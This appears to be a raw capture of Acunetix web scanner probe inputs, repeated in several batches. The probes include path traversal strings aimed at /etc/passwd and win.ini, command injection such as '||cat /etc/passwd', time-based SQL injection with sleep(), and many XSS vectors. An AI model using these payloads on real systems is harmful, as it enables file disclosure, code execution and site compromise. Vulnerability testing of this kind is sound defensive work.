..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"|"ld

testasp.vulnweb.com

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

acu1215\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1215

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

acux2588\xc0\xbez1\xc0\xbcz2a\x90bcxuca2588

1

1

'

^(#$!@#$)(()))******

1

/etc/passwd

1

1<ScRiPt >prompt(949146)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

"

1

1<script>prompt(991114)</script>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

||cat /etc/passwd

-1

1<ScRiPt >prompt(991725)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

'"()

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943959></ScRiPt>

-1)

&dir

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<ScRiPt >prompt(907850)</ScRiPt>

1

'&dir&'

"

1

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<video><source onerror="javascript:prompt(924806)">

1

1

VWUC838K'

1

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}

SJc2XQPQ')

1

http://hit1hXfaTkMbs.bxss.me/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931728)"></g></svg>

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

1

JuLpsWN0'))

1

1

file:///etc/passwd

comments

1

1<div style=width:expression(prompt(997248))>

-1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<iframe src='data:text/html

comments

1

"|dir

1

-1)

1

1

WEB-INF/web.xml

comments/.

1<body onload=prompt(996154)>

1

1

1

1

-1))

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969003)>

http://www.acunetix.tst

1

'"

WEB-INF\web.xml

1

cCMbjGvx'

1

1<img src=xyz OnErRor=prompt(910227)>

1

1'"()&%<ScRiPt >prompt(912574)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

0PftJty8')

<!--

response.write(9660813*9423167)

'"()&%<ScRiPt >prompt(997927)</ScRiPt>

1<img/src=">" onerror=alert(917196)>

1

1

1

../../../../../../../../../../boot.ini

1

'+response.write(9660813*9423167)+'

1

sdk3Afu1'))

1

1<ScRiPt%20>prompt(973131)</sCripT>

1_956954

1

"+response.write(9660813*9423167)+"

1

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

1

1&lt

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(998415) //\xf6>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<input autofocus onfocus=prompt(944162)>

1

1

................windowswin.ini

<a href='http://www.acunetix.com'>website security</a>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

..\..\..\..\..\..\..\..\windows\win.ini

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1_uNXkU <ScRiPt >prompt(908681)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${99909+99246}

1

'|'ld

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

acu6314\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6314

1&n949561=v933012

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

acux1561\xc0\xbez1\xc0\xbcz2a\x90bcxuca1561

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(991986)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF\web.xml

'

1<script>prompt(999335)</script>

1

"

)

1

1

testasp.vulnweb.com

/etc/passwd

1

1

1<ScRiPt >prompt(942114)</ScRiPt>

!(()&&!|*|*|

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

||cat /etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956763></ScRiPt>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<ScRiPt >prompt(923939)</ScRiPt>

1

1

&dir

1<video><source onerror="javascript:prompt(918567)">

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

'&dir&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901095)"></g></svg>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<div style=width:expression(prompt(980203))>

-1))

"&dir&"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"()

1

bsHepSsU'

'

1<iframe src='data:text/html

1

acunetix_wvs_invalid_filename

1

1

|dir

1

DvT9goca')

comments

1<body onload=prompt(925082)>

"

1

1

file:///etc/passwd

s5LsgLeR'))

1

http://hitCNGnff1GBy.bxss.me/

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989726)>

1

/\../\../\../\../\../\../\../etc/passwd

1

-1

"|dir

comments/.

1<img src=xyz OnErRor=prompt(924822)>

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

http://www.acunetix.tst

WEB-INF/web.xml

-1)

1

1'"()&%<ScRiPt >prompt(921822)</ScRiPt>

1<img/src=">" onerror=alert(977843)>

1

'"

WEB-INF\web.xml

1

-1))

1

'"()&%<ScRiPt >prompt(992175)</ScRiPt>

<!--

1<ScRiPt%20>prompt(974355)</sCripT>

1

1_987731

1

ewk09NtM'

1

1

1

1&lt

1

1

../../../../../../../../../../windows/win.ini

1

H2zVLIqY')

1

1

1

\xf6<img acu onmouseover=prompt(965777) //\xf6>

1

1

1

VD8RxlHL'))

1<input autofocus onfocus=prompt(984305)>

1

../../../../../../../../../../boot.ini

1

response.write(9395684*9539669)

<a href='http://www.acunetix.com'>website security</a>

1

1

&cat /etc/passwd&

1

../../../../../../../../../../windows/win.ini.jpg

'+response.write(9395684*9539669)+'

[url=http://www.acunetix.com]website security[/url]

"+response.write(9395684*9539669)+"

1

1_lUHuM <ScRiPt >prompt(915039)</ScRiPt>

'&cat /etc/passwd&'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

acu2225\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2225

1

cat /etc/passwd

acux6899\xc0\xbez1\xc0\xbcz2a\x90bcxuca6899

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1<ScRiPt >prompt(929725)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1<script>prompt(990907)</script>

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${99935+99439}

1<ScRiPt >prompt(947406)</ScRiPt>

1

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958546></ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n979357=v911926

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(990850)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<video><source onerror="javascript:prompt(965234)">

)

1

'

WEB-INF\web.xml

1

testasp.vulnweb.com

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992313)"></g></svg>

!(()&&!|*|*|

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

/etc/passwd

"

-1

^(#$!@#$)(()))******

1

1<div style=width:expression(prompt(949350))>

1

||cat /etc/passwd

1

1

1

1

-1)

1

1<iframe src='data:text/html

&dir

1

1

1

1

1

1<body onload=prompt(969639)>

1

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'&dir&'

1

1

1

Sabe8ovq'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968222)>

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"&dir&"

1<img src=xyz OnErRor=prompt(964106)>

1

1

qqfXMHn1')

1

'"()

|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'

1<img/src=">" onerror=alert(954711)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1

'|dir

qasHzyKS'))

1<ScRiPt%20>prompt(957591)</sCripT>

"

1

1

1

1

http://hitTjFxgiugEo.bxss.me/

-1

"|dir

${@print(md5(acunetix_wvs_security_test))}

1&lt

file:///etc/passwd

acunetix_wvs_invalid_filename

1

-1)

1

1

1

comments

1

\xf6<img acu onmouseover=prompt(991587) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

comments

1

1<input autofocus onfocus=prompt(931577)>

1

comments/.

LfddHN1d'

1

'"

WEB-INF/web.xml

1

qcbeTIPX')

1

1

<a href='http://www.acunetix.com'>website security</a>

1

<!--

1'"()&%<ScRiPt >prompt(921403)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

1

WEB-INF\web.xml

1smzbI1p'))

1

1_qhUsR <ScRiPt >prompt(969416)</ScRiPt>

1

'"()&%<ScRiPt >prompt(963968)</ScRiPt>

1

1

response.write(9019692*9123476)

1

1

1_953860

1

1

../../../../../../../../../../windows/win.ini

1

1

'+response.write(9019692*9123476)+'

1

1

1

1

1

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9019692*9123476)+"

&cat /etc/passwd&

1

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

1

................windowswin.ini

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

${99019+99473}

1

1

..\..\..\..\..\..\..\..\windows\win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n968708=v939550

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

testasp.vulnweb.com

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

acu9363\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9363

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

)

1

acux3576\xc0\xbez1\xc0\xbcz2a\x90bcxuca3576

1

1

'

/etc/passwd

1

!(()&&!|*|*|

1

1

1<ScRiPt >prompt(910509)</ScRiPt>

WEB-INF/web.xml

1

"

1

^(#$!@#$)(()))******

1

1<script>prompt(916511)</script>

||cat /etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'"()

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

&dir

1<ScRiPt >prompt(960461)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908526></ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

-1)

1

1

1<ScRiPt >prompt(978636)</ScRiPt>

1

"&dir&"

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'

1<video><source onerror="javascript:prompt(989454)">

1

file:///etc/passwd

|dir

1

F2FjofxM'

acunetix_wvs_invalid_filename

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997084)"></g></svg>

"

1

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

B9PegifL')

http://hit7F82HR6cQJ.bxss.me/

comments

1

1<div style=width:expression(prompt(961874))>

1

${@print(md5(acunetix_wvs_security_test))}

dbsInzMe'))

1

WEB-INF/web.xml

comments

"|dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1<iframe src='data:text/html

1

-1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

WEB-INF\web.xml

comments/.

-1)

1<body onload=prompt(975197)>

http://www.acunetix.tst

1

1

1

1

1

1

-1))

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918580)>

../../../../../../../../../../windows/win.ini

1

1

1

kiwKTSbc'

1'"()&%<ScRiPt >prompt(936044)</ScRiPt>

'"

1

1

../../../../../../../../../../boot.ini

1

1

1<img src=xyz OnErRor=prompt(903160)>

cCdALHGe')

'"()&%<ScRiPt >prompt(964695)</ScRiPt>

1

<!--

1

DAXfNFtG'))

1<img/src=">" onerror=alert(944100)>

../../../../../../../../../../windows/win.ini.jpg

1

1_959531

1

1

response.write(9995220*9088062)

1

1

1<ScRiPt%20>prompt(940020)</sCripT>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'+response.write(9995220*9088062)+'

1

1

&cat /etc/passwd&

1&lt

................windowswin.ini

"+response.write(9995220*9088062)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

\xf6<img acu onmouseover=prompt(905526) //\xf6>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

1

1<input autofocus onfocus=prompt(930395)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1_QFWqU <ScRiPt >prompt(984589)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

`cat /etc/passwd`

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

${99776+100167}

1

WEB-INF/web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

acu6553\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6553

"|"ld

1

WEB-INF\web.xml

1some_inexistent_file_with_long_name%00.jpg

1&n923866=v933649

acux10464\xc0\xbez1\xc0\xbcz2a\x90bcxuca10464

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(943454)</ScRiPt>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<script>prompt(985846)</script>

testasp.vulnweb.com

'

1

1

1

1<ScRiPt >prompt(937369)</ScRiPt>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

)

/etc/passwd

"

1

1

!(()&&!|*|*|

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917487></ScRiPt>

1

1

1

||cat /etc/passwd

^(#$!@#$)(()))******

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<ScRiPt >prompt(925976)</ScRiPt>

1

-1)

1

1

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1<video><source onerror="javascript:prompt(905229)">

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

'"()

1

XIr0LnNO'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933181)"></g></svg>

1

"&dir&"

1

1

1

yO9uCLIl')

1<div style=width:expression(prompt(906591))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1<iframe src='data:text/html

1

file:///etc/passwd

1

1

|dir

"

http://hitWvlhOYgDbT.bxss.me/

1

pUeG9cuI'))

1<body onload=prompt(929771)>

/\../\../\../\../\../\../\../etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

'|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989088)>

1

1

${@print(md5(acunetix_wvs_security_test))}\

WEB-INF/web.xml

comments

1<img src=xyz OnErRor=prompt(943764)>

1

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"|dir

1<img/src=">" onerror=alert(988452)>

1

1

http://www.acunetix.tst

WEB-INF\web.xml

comments

'"

1

1<ScRiPt%20>prompt(959180)</sCripT>

1'"()&%<ScRiPt >prompt(973515)</ScRiPt>

1

-1))

<!--

../../../../../../../../../../windows/win.ini

comments/.

1

1

1

1

'"()&%<ScRiPt >prompt(916060)</ScRiPt>

1&lt

1

../../../../../../../../../../boot.ini

1

1

\xf6<img acu onmouseover=prompt(962742) //\xf6>

1

1_916938

NzuzoQ57'

1

response.write(9940118*9542890)

1

1

1

1<input autofocus onfocus=prompt(907006)>

../../../../../../../../../../windows/win.ini.jpg

opIkzKlU')

'+response.write(9940118*9542890)+'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

TjBV7DgS'))

&cat /etc/passwd&

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"+response.write(9940118*9542890)+"

1

1

[url=http://www.acunetix.com]website security[/url]

1

'&cat /etc/passwd&'

1

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_0Opqf <ScRiPt >prompt(997472)</ScRiPt>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${99024+99538}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

acu4742\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4742

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n907279=v963618

1

acux9349\xc0\xbez1\xc0\xbcz2a\x90bcxuca9349

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(904984)</ScRiPt>

1

1

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(981548)</script>

1

"|"ld

WEB-INF\web.xml

testasp.vulnweb.com

1

1

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<ScRiPt >prompt(919227)</ScRiPt>

1

!(()&&!|*|*|

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942708></ScRiPt>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

^(#$!@#$)(()))******

1

/etc/passwd

1

1

1<ScRiPt >prompt(968245)</ScRiPt>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

'

1

1

1

1

1

1<video><source onerror="javascript:prompt(980353)">

1

-1

1

1

"

1

-1)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926877)"></g></svg>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

||cat /etc/passwd

1<div style=width:expression(prompt(960687))>

1

1

1

1

'"()

&dir

1<iframe src='data:text/html

SDslA9Ks'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

1

1

1

1<body onload=prompt(927516)>

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

8qPYVlik')

1

"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965440)>

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

CHfQNGBc'))

1

1

"&dir&"

1

1<img src=xyz OnErRor=prompt(999174)>

-1

${@print(md5(acunetix_wvs_security_test))}\

1

1

file:///etc/passwd

|dir

1

1<img/src=">" onerror=alert(972259)>

1

acunetix_wvs_invalid_filename

-1)

1

http://hitVGNVkfhrIe.bxss.me/

1<ScRiPt%20>prompt(958340)</sCripT>

/\../\../\../\../\../\../\../etc/passwd

1

-1))

comments

1

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

1

1&lt

1

awrU4128'

comments

1

"|dir

1

WEB-INF\web.xml

1

http://www.acunetix.tst

'"

\xf6<img acu onmouseover=prompt(943142) //\xf6>

1'"()&%<ScRiPt >prompt(958765)</ScRiPt>

comments/.

JkuECAtN')

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(955894)>

<!--

1

1

1

'"()&%<ScRiPt >prompt(977514)</ScRiPt>

BXicz5NF'))

1

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../boot.ini

1_946761

1

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_VVmmw <ScRiPt >prompt(949148)</ScRiPt>

1

response.write(9726664*9908220)

../../../../../../../../../../windows/win.ini.jpg

1

1

1

'+response.write(9726664*9908220)+'

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9726664*9908220)+"

&cat /etc/passwd&

1

1

1

1

1

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

${100283+99658}

`cat /etc/passwd`

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

